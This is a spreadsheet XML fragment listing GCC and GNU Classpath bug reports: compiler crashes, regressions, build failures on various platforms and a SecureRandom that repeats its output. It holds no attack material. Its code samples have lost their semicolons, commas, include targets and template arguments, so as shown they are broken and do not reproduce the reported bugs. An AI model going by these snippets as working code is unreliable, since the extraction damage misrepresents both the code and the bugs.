  <si>
    <t>GCC-330</t>
  </si>
  <si>
    <t>Bug in g++ version 2.95.2</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Mon 12 Jun 2000 10:56:32 +0200 (CEST)
 Original-Message-ID: 
 Hello -
 I have a simple C++ program (included below) that complies and links
 correctly with g++ -o foo foo.cxx adding a -ansi to the command line
 (i.e. using g++ -ansi -o foo foo.cxx) causes an error (i.e. g++ cannot
 find lrand48):
 MLO@mlinux 86 $ g++ -ansi -o foo foo.cxx                   
 /usr/soft/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/stl_algo.h: In function `int __random_number(int)':
 /usr/soft/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/stl_algo.h:852:   instantiated from `random_shuffle(int * int *)'
 foo.cxx:17:   instantiated from here
 /usr/soft/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/stl_algo.h:841: `lrand48' undeclared (first use this function)
 /usr/soft/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/stl_algo.h:841: (Each undeclared identifier is reported only once
 /usr/soft/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/stl_algo.h:841: for each function it appears in.)
 g++ version: 2.95.2
 machine and OS: i686-pc-linux-gnu linux kernel 2.2.12-20 (RedHat 6.1)
 gcc/g++ configured with: ./configure i686-pc-linux-gnu --prefix=/usr/soft
 File that compiles/links correctly without -ansi and that does not with
 -ansi:
 #include 
 #include 
 #include 
 class conta {
     int n
   public:
     conta(const int first=0) throw() : n(first) {}
     int operator() () throw() { return n++ }
 }
 int main() {
   const int nCarte = 40
   std::vector mazzo(nCarte)
   std::generate_n(mazzo.begin() nCarte conta(1))
   std::random_shuffle(mazzo.begin() mazzo.end())
   std::copy(mazzo.begin() mazzo.end()
	     std::ostream_iterator(std::cout  ))
   std::cout &lt;&lt; std::endl
 }
 -- 
 Maurizio Loreti                         http://www.pd.infn.it/~loreti/mlo.html
 Univ. of Padova Dept. of Physics - Padova Italy            loreti@pd.infn.it
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-39815</t>
  </si>
  <si>
    <t>[4.5 Regression] Revision 146317 caused many libstdc++ failures</t>
  </si>
  <si>
    <t>Revision 146317:
http://gcc.gnu.org/ml/gcc-cvs/2009-04/msg00954.html
caused:
FAIL: 29_atomics/atomic_flag/test_and_set/explicit.c (test for excess errors)
FAIL: 29_atomics/atomic_flag/test_and_set/implicit.c (test for excess errors)
FAIL: 29_atomics/headers/stdatomic.h/debug_mode.c (test for excess errors)
FAIL: 29_atomics/headers/stdatomic.h/functions.c (test for excess errors)
FAIL: 29_atomics/headers/stdatomic.h/macros.c (test for excess errors)
FAIL: 29_atomics/headers/stdatomic.h/types.c (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-2113</t>
  </si>
  <si>
    <t>Internal compiler error in expand_inline_function at integrate.c:676</t>
  </si>
  <si>
    <t>Cross Compiling linux kernel 2.4.2 for development on new systems
I configured the kernel then ran a:
alias mips-make `make ARCH=mips CROSS_COMPILE=mips-linux-`
mips-make dep   {did it's thin correctly}
mips-make boot  { Yeilded the errors}:
/usr/src/linux/include/linux/fs.h:561: warning: `struct flock64' declared inside parameter list
/usr/src/linux/include/linux/fs.h:561: warning: its scope is only this definition or declaration which is probably not what mips-linux-gcc -D__KERNEL__ -I
/usr/src/linux/include -Wall -Wstrict-prototypes -O2 -fomit-frame-pointer -fno-strict-aliasing -G 0 -mno-abicalls -fno-pic -mcpu=r4600 -mips2 -Wa--trap -p
ipe  -DUTS_MACHINE='mips' -c -o init/version.o init/version.c
make CFLAGS=-D__KERNEL__ -I/usr/src/linux/include -Wall -Wstrict-pro/usr/src/linux/include/linux/fs.h:561: warning: `struct flock64' declared inside param
eter list
/usr/src/linux/include/linux/fs.h:561: warning: its scope is only this definition or declaration which is probably not what you want.
/usr/src/linux/include/linux/fs.h:562: warning: `struct flock64' declared inside parameter list
/usr/src/linux/include/linux/fs.h:561: warning: `struct flock64' declared inside parameter list
/usr/src/linux/include/linux/fs.h:561: warning: its scope is only this definition or declaration which is probably not what you want.
/usr/src/linux/include/linux/fs.h:562: warning: `struct flock64' declared inside parameter list
/usr/src/linux/include/linux/fs.h:561: warning: `struct flock64' declared inside parameter list
/usr/src/linux/include/linux/fs.h:561: warning: its scope is only this definition or declaration which is probably not what you want.
/usr/src/linux/include/linux/fs.h:562: warning: `struct flock64' declared inside parameter list
/usr/src/linux/include/linux/fs.h:561: warning: `struct flock64' declared inside parameter list
/usr/src/linux/include/linux/fs.h:561: warning: its scope is only this definition or declaration which is probably not what you want.
/usr/src/linux/include/linux/fs.h:562: warning: `struct flock64' declared inside parameter list
/usr/src/linux/include/linux/fs.h:561: warning: `struct flock64' declared inside parameter list
/usr/src/linux/include/linux/fs.h:561: warning: its scope is only this definition or declaration which is probably not what you want.
/usr/src/linux/include/linux/fs.h:562: warning: `struct flock64' declared inside parameter list
panic.c: In function `panic':
panic.c:80: `loops_per_sec' undeclared (first use in this function)
panic.c:80: (Each undeclared identifier is reported only once
panic.c:80: for each function it appears in.)
panic.c:80: Tree check: expected class 't' have 'x' (error_mark)
panic.c:80: Internal compiler error in expand_inline_function at integrate.c:676
   Please submit a full bug report.
   See  for instructions.
make[2]: *** [panic.o] Error 1
make[1]: *** [first_rule] Error 2
make: *** [_dir_kernel] Error 2
nel'
make[1]: Leaving directory `/usr/src/linux/kernel'
Release:
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
Environment:
Slackware 7.1
Dual Intel PIII {SGI 320}
Linux bigbang 2.2.10 #7 SMP Thu Jan 18 14:23:51 PST 2001 i686 unknown 
Kernel had the SGI 320 Kernel Patch installed
Setup for a cross compiler for MIPS platform and compiling with:
make ARCH=mips CROSS_COMPILE=mips-linux-
How-To-Repeat:
ftp to oss.sgi.com and retrieve:
/pub/linux/mips/mips-linux/simple/crossdev/cross-all-001027.tar
unzip the tar edit make-cross.sh
set the BASE_PATH and INST_PREFIX and set SPARC32=
save the file and run make-cross.sh this will take a while.
It will build the binutils libs compiler and kernel headers for the cross-compiler for mips.
when it is done it will leave a directory called mips-linux in your 
INST_PREFIX dir.
cp -a {INST_PREFIX}/mips-linux/* /usr/
ftp kernel.org and retrive:
/pub/linux/kernel/v2.4/linux-2.4.2.tar.gz
mv /usr/src/linux something.old
tar -xvzf linux-2.4.2.tar.gz -C /usr/src
cd /usr/src/linux
alias mips-make `make ARCH=mips CROSS_COMPILE=mips-linux-`
take the .config that I attached to this and cp it to your new /usr/src/linux
mips-make oldconfig
mips-make dep
mips-make boot
{Bang error}
I did a:
mips-make boot 1&gt;/tmp/2.4.2 2&gt;/tmp/2.4.2 
incase you notice that some of the stuff might look funny.
Please let me know what you find scince I can't continue 
working on the port until it gets past here.</t>
  </si>
  <si>
    <t>chandler</t>
  </si>
  <si>
    <t>GCC-58968</t>
  </si>
  <si>
    <t>Powerpc -mlra cannot compile ormas1.f in gamess Spec 2006 with -m32 -mcpu=power7 -O3 -mlra -w -ffast-math  -funroll-loops</t>
  </si>
  <si>
    <t>Created attachment 31139
Fortran source to show the problem
The spec 2006 benchmark gamess cannot be compiled with GCC subversion id 204267 using the -m32 -mcpu=power7 -O3 -mlra -w -ffast-math  -funroll-loops options (the -w is to silence some of the warnings due to the types not being the same but it works perfectly without the -mlra option).  Dropping either -mlra or -funroll-loops will allow the benchmark to be compiled.  This may be the same underlying bug as PR 58967 since that also will not build if both loop unrolling and lra register allocation are specified.  I'm submitting this as separate bug because the insn that it is dying on is different.
Here is the traceback:
-bns-&gt; /opt/at7.0/bin/gdb f951 
GNU gdb (GDB) 7.6.50.20130722-cvs
Copyright (C) 2013 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as powerpc64-linux.
Type show configuration for configuration details.
For bug reporting instructions please see:
.
Find the GDB manual and other documentation resources online at:
.
For help type help.
Type apropos word to search for commands related to word.
..
Reading symbols from /home/meissner/fsf-build-ppc64/trunk-204267/gcc/f951...done.
Breakpoint 1 at 0x10d24480: file /home/meissner/fsf-src/trunk-204267/gcc/diagnostic.c line 1182.
Breakpoint 2 at 0x10d25dd0: file /home/meissner/fsf-src/trunk-204267/gcc/diagnostic.c line 1123.
Breakpoint 3 at 0x10d9c3a0
Breakpoint 4 at 0x10d9c448
File tree.h will be skipped when stepping.
Successfully loaded GDB hooks for GCC
(gdb) r -mcpu=power7 -quiet -O3 -mlra -w -ffast-math  -funroll-loops  -m32 ormas1.fppized.f
Starting program: /home/meissner/fsf-build-ppc64/trunk-204267/gcc/f951 -mcpu=power7 -quiet -O3 -mlra -w -ffast-math  -funroll-loops  -m32 ormas1.fppized.f
Breakpoint 1 fancy_abort (file=0x10dfb400 /home/meissner/fsf-src/trunk-204267/gcc/lra.c line=2034 function=0x10dfb1b8  check_rtl)
    at /home/meissner/fsf-src/trunk-204267/gcc/diagnostic.c:1182
1182    {
(gdb) up
#1  0x000000001059fb80 in check_rtl (final_p=final_p@entry=true) at /home/meissner/fsf-src/trunk-204267/gcc/lra.c:2034
2034                lra_assert (constrain_operands (1))
(gdb) print insn
$1 = (rtx) 0xfffabc0d338
(gdb) pr
warning: Expression is not an assignment (and might have no effect)
(insn 19319 19318 19320 1557 (set (reg:CC 66 ctr [4379])
        (reg:CC 66 ctr [4379])) 439 {*movcc_internal1}
     (nil))
(gdb) 
In the past when I was looking at the code we could paper over the problem by adding a constraint in movcc_internal1 that allowed moving the CTR register to itself.  However LRA should not be generating a move to the same register (which will eventually be deleted).  An alternative method is constrain CC to not go in the CTR register.  I did this at one point but it did have some performance impacts so I never submitted the code.</t>
  </si>
  <si>
    <t>GCC-5288</t>
  </si>
  <si>
    <t>cpp -traditional -dD does not output preprocessing result</t>
  </si>
  <si>
    <t>When calling cpp as cpp -traditional -dD it is supposed to output
both the #defines and the result of the precprocessing.  However with
these options cpp outputs only the #defines and does not output the
result of the preprocessing.  (The option combination cpp -dD
(without the -traditional) works fine.)
Release:
3.0.3
Environment:
System: Linux lilypond 2.4.10-4GB #1 Tue Sep 25 12:33:54 GMT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0.3/configure --prefix=/home/eschnett/gcc</t>
  </si>
  <si>
    <t>GCC-30157</t>
  </si>
  <si>
    <t>cxa_atexit check doesn't work</t>
  </si>
  <si>
    <t>The following tests fail on hppa1.1-hp-hpux10.20:
FAIL: g++.old-deja/g++.other/init18.C execution test
FAIL: g++.old-deja/g++.other/init19.C execution test
FAIL: g++.old-deja/g++.other/init5.C execution test
These tests are xfailed on targets that don't support cxa_atexit
using using the check_cxa_atexit_available.  This target doesn't
have cxa_atexit so the chack should xfail these tests.</t>
  </si>
  <si>
    <t>GCC-22013</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in gimple_add_tmp_var at gimplify.c:535</t>
  </si>
  <si>
    <t>Following testcase extracted from WINE crashes in gimple_add_tmp_var at 
gimplify.c:535 
/home/marcus/projects/gcc/BIN/bin/gcc -O2 -c dialog.i  
dialog.i: In function 'f': 
dialog.i:8: internal compiler error: in gimple_add_tmp_var at gimplify.c:535 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
gcc version 4.1.0 20050610 (experimental)</t>
  </si>
  <si>
    <t>GCC-54053</t>
  </si>
  <si>
    <t>[4.7 Regression] g++ accepts (invalid?) 0 expression.</t>
  </si>
  <si>
    <t xml:space="preserve">g++ -std=c++11 compiles following code w/o errors.
#include 
int main()
{
        std::cout &lt;&lt; 0
}
while comeau/clang reports syntax error:
t.cpp:5:17: error: expected '' after expression
        std::cout &lt;&lt; 0
                       ^
                       </t>
  </si>
  <si>
    <t>GCC-1451</t>
  </si>
  <si>
    <t>failure to compile an interface method invocation on a sub-interface</t>
  </si>
  <si>
    <t xml:space="preserve">From: bryce@sourceware.cygnus.com
To: java-gnats@sourceware.cygnus.com
Cc:  
Subject: gcj/71
Date: 20 Oct 1999 00:09:33 -0000
 	1999-10-19  Bryce McKinlay  
 	* libjava.compile/invokeinterface: New directory.
 	* libjava.compile/invokeinterface/Test.java: New file. Test code for
 	PR gcj/71 and PR gcj/72.
 	* libjava.compile/invokeinterface/A.java: New file.
 	* libjava.compile/invokeinterface/B.java: New file.
</t>
  </si>
  <si>
    <t>GCC-20299</t>
  </si>
  <si>
    <t>Wrong alignment for __m128 variable size array</t>
  </si>
  <si>
    <t>When I compile the following program with gcc 3.3.5 (debian unstable):
#include 
int main()
{
        int i=1
        float f
        __m128 m[i]
        float f2
        __m128 n[i]
        printf (%x %x\n m n)
}
I get:
% ./align
affff8ec affff8dc
which is wrong since m and n should be aligned on a 16-byte boundary. If I
declare the arrays with a constant size (instead of i) then the alignment is
right. gcc-3.4.4 works fine. The problem is there regardless of the compile
options I use (e.g. -msse -O2).</t>
  </si>
  <si>
    <t>CLASSPATH-26688</t>
  </si>
  <si>
    <t>Classpath Makefiles assume CVS source control</t>
  </si>
  <si>
    <t>The makefiles for classpath as included in the libjava tree run find to gather lists of specific files (for META-INF etc).  The matched files are then copied to the build tree.
However the command lines used for the find invocations specifically mention 'CVS' as a directory to exclude since gcc has switched to subversion '.svn' should be excluded instead.
I /think/ this only impacts the list of files in the build tree and as such is fairly trivial but I suppose the files may end up being included in some jar file too.</t>
  </si>
  <si>
    <t>tim.vanholder</t>
  </si>
  <si>
    <t>GCC-2079</t>
  </si>
  <si>
    <t>iostream.h needs more using declarations</t>
  </si>
  <si>
    <t>The backwards-compatibility header  needs more
|using| declarations to compile old code.  In particular
the following two are needed to compile Mozilla with the
gcc-3_0-branch:
using std::hex
using std::dec
There are probably a number of others that are needed as
well (although not for Mozilla).
Release:
unknown
Environment:
Using gcc and libstdc++ from gcc-3_0-branch:
gcc version 3.0 20010222 (prerelease)
How-To-Repeat:
Create a C++ file containing the following:
-----
#include 
int main()
{
  cout &lt;&lt; hex &lt;&lt; 12 &lt;&lt; endl // should output c
  return 0
}
-----
and compile with g++.  It gives the error:
test.cpp: In function `int main()':
test.cpp:6: `hex' undeclared (first use this function)
test.cpp:6: (Each undeclared identifier is reported only once for each function    it appears in.)
This file compiles with older releases of gcc and (presumably) with all the other C++ compilers that can
compile Mozilla.  If I add the two lines I mentioned above
to iostream.h the file compiles correctly.</t>
  </si>
  <si>
    <t>GCC-40885</t>
  </si>
  <si>
    <t>build_indirect_ref i18n problems</t>
  </si>
  <si>
    <t>c-typeck.c:build_indirect_ref takes an argument errorstring which may
be array indexing unary * or -&gt; and is not translated.  It should
instead take an enum and pass three distinct full sentences to
error_at.</t>
  </si>
  <si>
    <t>GCC-42206</t>
  </si>
  <si>
    <t>ipa-prop.c: use of uninitialised local data</t>
  </si>
  <si>
    <t>I just had a look at the source code of gcc version 4.5 snapshot 20091126
and I notice the following problem
~/gcc/20091126/src/gcc-4.5-20091126/gcc&gt; fgrep note_count ipa-prop.c
  int note_count
    note_count++
  lto_output_uleb128_stream (ob-&gt;main_stream note_count)
Please note that
* line 1 of the fgrep output is an *un* initialised declaration of local variable note_count.
* line 2 increments it
* line 3 uses it.
At the shallow level the code is broken and local variable note_count
needs initialisation but at a deeper level this problem got through
the -Werror mechanism of bootstrap.
For the shallow level problem maybe initialisation to zero would
be sufficient. For the deeper level problem I cannot help.</t>
  </si>
  <si>
    <t>CLASSPATH-24642</t>
  </si>
  <si>
    <t>Failure to produce random values.</t>
  </si>
  <si>
    <t>The following code should produce random numbers between 0..2^5-1:
import java.math.BigInteger
import java.security.SecureRandom
class RndTest {
   public static void main(String[] args) {
      SecureRandom rnd = new SecureRandom()
      for (int i = 0 i &lt; 10 i++)
         System.out.print(new BigInteger(5rnd) +  )
   }
}
[ben@localhost junit]$ java -version
java version 1.4.2
gij (GNU libgcj) version 4.0.0 20050519 (Red Hat 4.0.0-8)
[ben@localhost src]$ java RndTest
0 31 12 21 21 16 8 24 15 20
[ben@localhost src]$ java RndTest
0 31 12 21 21 16 8 24 15 20
[ben@localhost src]$ java -Djava.security.egd=file:/dev/random RndTest
0 31 12 21 21 16 8 24 15 20
[brh@jupiter ~]$ java -version
java version 1.4.2
gij (GNU libgcj) version 4.0.1 20050727 (Red Hat 4.0.1-5)
Copyright (C) 2005 Free Software Foundation Inc.
This is free software see the source for copying conditions. There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
[brh@jupiter ~]$ java RndTest
0 31 12 21 21 16 8 24 15 20
[brh@jupiter ~]$ java RndTest
0 31 12 21 21 16 8 24 15 20 
In addition the following fails (one would expect an 8):
import java.math.BigInteger
import java.security.SecureRandom
public class BigIntTest {
   public static void main(String[] args) {
      System.out.println(BigInteger.probablePrime(8new SecureRandom()).bitLength())
   }
}
[ben@localhost junit]$ java -version
java version 1.4.2
gij (GNU libgcj) version 4.0.0 20050519 (Red Hat 4.0.0-8)
[ben@localhost ~]$ java BigIntTest
2
[ben@localhost ~]$ java BigIntTest
2
See also: http://forums.java.sun.com/thread.jspa?messageID=3960085</t>
  </si>
  <si>
    <t>smythe70</t>
  </si>
  <si>
    <t>GCC-8454</t>
  </si>
  <si>
    <t>G++ 2.95 gives an ICE while compiling the copy constructor of template class CTTT(see attach)</t>
  </si>
  <si>
    <t>bash-2.04$ g++ -o t template.cpp
template.cpp: In method `CTTT::CTTT(const CTTT &amp;)':
template.cpp:31: Internal compiler error.
template.cpp:31: Please submit a full bug report.
template.cpp:31: See  for instructions.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
FreeBSD 4.1-RELEASE on i386
How-To-Repeat:
//
// A template class with a single template parameter
//
template 
class CT
{
public:
    CT(void)
    {}
    CT(const CT&amp; rc_other)
    {}
    virtual ~CT(void)
    {}
}
//
// A template class with two template parameters.
// The first template parameter is a template class itself with one
// template parameter.
//
template  class TT class T&gt;
class CTTT : public TT
{
public:
    CTTT(void)
    {}
    // It will fail here.
    CTTT(const CTTT&amp; rc_other) : TT(rc_other)
    {}
    virtual ~CTTT(void)
    {}
}
//
// Other template class.
// This time COther hinherits a hard-coded template base.
//
template 
class COther : public CT
{
public:
    COther(void) : CT()
    {}
    COther(const COther&amp; rc_other) : CT(rc_other)
    {}
    virtual ~COther(void)
    {}
}
//
// The test for the template.
// I declare an instance of each template class to force the call of all
// ctors and dtors.
//
int main()
{
    CT         cT
    CT         cTCopy(cT)
    CTTT    cTTT
    CTTT    cTTTCopy(cTTT)
    COther     cO
    COther     cOCopy(cO)
    return 0
}</t>
  </si>
  <si>
    <t>jesteves</t>
  </si>
  <si>
    <t>GCC-3245</t>
  </si>
  <si>
    <t>bad code generated</t>
  </si>
  <si>
    <t>Code generated is funny. tested with xine and vlc. gcc2.95.3 generates workable
binaries with the same code.
I get stuff like
** XINE **
xine_init: audio thread created
xine.c(862): /usr/local/xine/lib/xine/plugins/input_file.so doesn't seem to be installed (/usr/local/xine/lib/xine/plugins/input_file.so: undefined symbol: __dso_handle)
** VLC **
module: browsing `lib'
module warning: cannot open lib/libdvdcss.so (lib/libdvdcss.so: undefined symbol: __dso_handle)
	module warning: cannot open lib/dsp.so (lib/dsp.so: undefined symbol: __dso_handle)
	module warning: cannot open lib/esd.so (lib/esd.so: undefined symbol: __dso_handle)
	module warning: cannot open lib/sdl.so (lib/sdl.so: undefined symbol: __dso_handle)
	module warning: cannot open lib/gtk.so (lib/gtk.so: undefined symbol: __dso_handle)
	module warning: cannot open lib/x11.so (lib/x11.so: undefined symbol: __dso_handle)
Release:
3.0
Environment:
System: Linux turtle.carumba.com 2.2.19 #3 Sat May 5 12:59:50 PDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr/local/gcc --enable-languages=c++</t>
  </si>
  <si>
    <t>jauderho</t>
  </si>
  <si>
    <t>GCC-49154</t>
  </si>
  <si>
    <t>[4.7 Regression]: build fails on cris-elf in libgcc: ICE in setup_pressure_classes at ira.c:902</t>
  </si>
  <si>
    <t>A patch in the revision range (last_known_working:first_known_failing) 174114:174124 caused the build for cris-elf to fail as follows:
...
checking whether ln -s works... yes
checking for cris-elf-gcc... /tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc/xgcc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc/ -nostdinc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/newlib/ -isystem /tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/newlib/targ-include -isystem /tmp/hpautotest-gcc1/gcc/newlib/libc/include -B/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libgloss/cris -L/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libgloss/libnosys -L/tmp/hpautotest-gcc1/gcc/libgloss/cris -B/tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/bin/ -B/tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/lib/ -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/include -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/sys-include   
checking for suffix of object files... configure: error: in `/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libgcc':
configure: error: cannot compute suffix of object files: cannot compile
See `config.log' for more details.
make[1]: *** [configure-target-libgcc] Error 1
make[1]: Leaving directory `/tmp/hpautotest-gcc1/cris-elf/gccobj'
The applicable part of that config.log is:
configure:3268: /tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc/xgcc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc/ -nostdinc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/newlib/ -isystem /tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/newlib/targ-include -isystem /tmp/hpautotest-gcc1/gcc/newlib/libc/include -B/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libgloss/cris -L/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libgloss/libnosys -L/tmp/hpautotest-gcc1/gcc/libgloss/cris -B/tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/bin/ -B/tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/lib/ -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/include -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/sys-include    -c -g -O2  conftest.c &gt;&amp;5
conftest.c:1:0: internal compiler error: in setup_pressure_classes at ira.c:902
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
configure:3272: $? = 1
configure: failed program was:
| /* confdefs.h */
| #define PACKAGE_NAME GNU C Runtime Library
| #define PACKAGE_TARNAME libgcc
| #define PACKAGE_VERSION 1.0
| #define PACKAGE_STRING GNU C Runtime Library 1.0
| #define PACKAGE_BUGREPORT 
| #define PACKAGE_URL http://www.gnu.org/software/libgcc/
| /* end confdefs.h.  */
| 
| int
| main ()
| {
| 
|   
|   return 0
| }
Author of suspect patches in revision range CC:ed.</t>
  </si>
  <si>
    <t>GCC-70577</t>
  </si>
  <si>
    <t>[6 regression] tree-ssa/prefetch-5.c scan-tree-dump-times aprefetch failures</t>
  </si>
  <si>
    <t>PASS: gcc.dg/tree-ssa/prefetch-5.c (test for excess errors)
FAIL: gcc.dg/tree-ssa/prefetch-5.c scan-tree-dump-times aprefetch Issued prefetch 2
FAIL: gcc.dg/tree-ssa/prefetch-5.c scan-tree-dump-times aprefetch Not prefetching 1</t>
  </si>
  <si>
    <t>GCC-17248</t>
  </si>
  <si>
    <t>[3.4 Regression] __always_inline__ throws unimplemented in -O0 mode</t>
  </si>
  <si>
    <t>The C++ compiler fails when the -O0 optimization
mode and a method has the __always_inline__ attribute
specified. The command line used was:
gpp -O0 -c allocator.cpp -I./ -save temps
The version string:
Reading specs from c:/djgpp/bin/../lib/gcc/djgpp/3.41/specs
Configured with: /Build/gcc34/gnu/gcc-3.41/configure djgpp
--prefix=/dev/env/DJDIR --disable-nls --disable-libstdcxx-pch
Thread model: single
gcc version 3.4.1
It displays the following message:
./base/list.h: In destructor `base::list::~list() [with traits =
base::simple_list&lt;mdl::expression_base* 
false&gt;::aux_simple_traits]':
./base/list.h:452:   instantiated from `base::list::~list() [with traits
= base::simple_list&lt;mdl::expression_base* 
false&gt;::aux_simple_traits]'
ast.h:736:   instantiated from here
./base/list.h:431: sorry unimplemented: inlining failed in call to 'static void
base::list::aux_erase_on_delete::apply(base::list&amp;)
[with T = base::list&lt;base::simple_list&lt;mdl::expression_base* 
false&gt;::aux_simple_traits &gt; traits =
base::simple_list&lt;mdl::expression_base* 
false&gt;::aux_simple_traits]': function body not
available
./base/list.h:452: sorry unimplemented: called from here
The snippet has ~800KiB so it is not included in this text 
but here's a link to it:
http://www.ii.uni.wroc.pl/~wyderski/allocator.ii</t>
  </si>
  <si>
    <t>wyderski</t>
  </si>
  <si>
    <t>GCC-7626</t>
  </si>
  <si>
    <t>Compiling GCC 3.2 on an Alpha running Tru64 UNIX 5.0</t>
  </si>
  <si>
    <t>Bugsy
I cannot get GCC to build on my Alpha.  Some info:
GCC 3.2 (downloaded source from ftp.gnu.org)
System Type: alphaev67-dec-osf5  (Alpha DS20 running Tru64 UNIX 5.0)
GNU make 3.79-1
The OS has never been patched.
I ran the 'configure' script with no arguments.  Next I ran 'make bootstrap' and after some time I received the following error:
stage2/xgcc -Bstage2/ -B/usr/local/alphaev67-dec-osf5.0/bin/ -c -DIN_GCC    -g -
O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtradition
al -pedantic -Wno-long-long  -DHAVE_CONFIG_H    -I. -I. -I. -I./. -I./config -I.
/../include predict.c -o predict.o
predict.c: In function `propagate_freq':
predict.c:708: Internal compiler error in @Â£
@ at F:537413696                                                               
Please submit a full bug report                                                
with preprocessed source if appropriate.                                        
See  for instructions.           
make[2]: *** [predict.o] Error 1                                                
make[2]: Leaving directory `/usr/local/src/gcc-3.2/gcc'                         
make[1]: *** [stage3_build] Error 2                                             
make[1]: Leaving directory `/usr/local/src/gcc-3.2/gcc'                         
make: *** [bootstrap] Error 2
Release:
gcc-3.2
Environment:
Alpha DS20 running Tru64 UNIX 5.0
How-To-Repeat:
Need an Alpha (DS30) running Tru64 UNIX 5.0 (unpatched)
configure
make bootstrap
watch it compile happily until pplllbbbt!</t>
  </si>
  <si>
    <t>rfrantz</t>
  </si>
  <si>
    <t>GCC-80365</t>
  </si>
  <si>
    <t>undefined memcpy while writing zero length array on unformatted stream in unix.c</t>
  </si>
  <si>
    <t>! undefined memcpy writing zero length array on unformatted stream
! must be compiled and run
! ../../../gcc-trunk-246751/libgfortran/io/unix.c:596:7: runtime error: null pointer passed as argument 2 which is declared to never be null
! unix.c:596 is memcpy (s-&gt;buffer + (s-&gt;logical_offset - s-&gt;buffer_offset) buf nbyte)
! buf is zero but luckily nbyte is zero as well
! just in case I suggest putting assert(buf || !nbyte) before memcpy
      real v(1:0)
      open(1form='unformatted'access='stream')
      write(unit=1pos=1) v
      end
This is related to bug 67536</t>
  </si>
  <si>
    <t>GCC-47586</t>
  </si>
  <si>
    <t>[F03] allocatable components: deep copy missing</t>
  </si>
  <si>
    <t>Follow-up to PR 47455 (comment #5):
  type :: tx
    integer dimension(:) allocatable :: i
  end type tx
  type(tx) :: this
  type(tx) target :: that
  type(tx) pointer :: p
  allocate(that%i(2))
  that%i = [0 0]
  p =&gt; that
!   this = that  ! (1) direct assignment: works (deep copy)
!   this = p     ! (2) using a pointer works as well
  this = find_x(that)  ! (3) pointer function: fails (deep copy missing)
  that%i = [1 1]
  print *this%i
  if(any (this%i /= [0 0])) call abort()
contains
  function find_x(that)
    type(tx) target  :: that
    type(tx) pointer :: find_x
    find_x =&gt; that
  end function find_x
end
This code currently fails for the third case while it works for the first two.</t>
  </si>
  <si>
    <t>GCC-29746</t>
  </si>
  <si>
    <t>gcc fails to bootstrap on sh4-*-linux-gnu</t>
  </si>
  <si>
    <t>The bootstrap on sh4-unknown-linux-gnu fails during stage2 with
../../TMP/trunk/gcc/ifcvt.c: In function 'noce_try_store_flag_constants':
../../TMP/trunk/gcc/ifcvt.c:1036: error: insn does not satisfy its constraints:
(insn 871 901 872 42 ../../TMP/trunk/gcc/ifcvt.c:977 (set (reg:SI 147 t)
        (eq:SI (reg:SI 1 r1)
            (const_int 1 [0x1]))) 1 {cmpeqsi_t} (nil)
    (nil))
../../TMP/trunk/gcc/ifcvt.c:1036: internal compiler error: in copyprop_hardreg_forward_1 at regrename.c:1614</t>
  </si>
  <si>
    <t>GCC-9650</t>
  </si>
  <si>
    <t>string literal contactenation doesn't work with #include</t>
  </si>
  <si>
    <t xml:space="preserve">From: frey waid 
To: neil@gcc.gnu.org gcc-bugs@gcc.gnu.org gcc-prs@gcc.gnu.org
   nobody@gcc.gnu.org gcc-gnats@gcc.gnu.org
Cc:  
Subject: Re: preprocessor/9650: string literal contactenation doesn't work with 
 #include
Date: Mon 10 Feb 2003 15:01:49 -0800
 that's what i was doing before.  so i had this:
 #include COMP_INC(compfile)
 #define COMP_INC(compfile)   #comp /include/ #file
 do you have another method in mind?
 frey
 neil@gcc.gnu.org wrote:
 &gt; 
 &gt; Synopsis: string literal contactenation doesn't work with #include
 &gt; 
 &gt; State-Changed-From-To: open-&gt;closed
 &gt; State-Changed-By: neil
 &gt; State-Changed-When: Mon Feb 10 22:57:32 2003
 &gt; State-Changed-Why:
 &gt;     Not a bug.
 &gt; 
